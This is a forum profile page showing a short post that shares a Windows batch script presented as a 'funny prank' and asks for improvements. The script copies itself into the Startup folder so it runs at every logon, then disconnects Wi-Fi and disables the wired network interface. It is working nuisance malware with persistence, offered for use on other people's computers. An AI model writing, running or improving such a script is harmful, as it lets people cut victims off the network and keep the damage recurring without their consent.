Jump to content

greglemond

Member
  • Posts

    9
  • Joined

  • Last visited

Posts posted by greglemond

  1. Thought I would share this batch file code that could be a really funny prank. Im open to ideas to improve it! 

     

    @echo off

    set startDIR="%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
    echo "Moving %0 to the %startDIR%"

    copy %0 %startDIR%

    color 2
    netsh wlan disconnect
    netsh interface set interface "Local Area Connection" DISABLED
    pause

×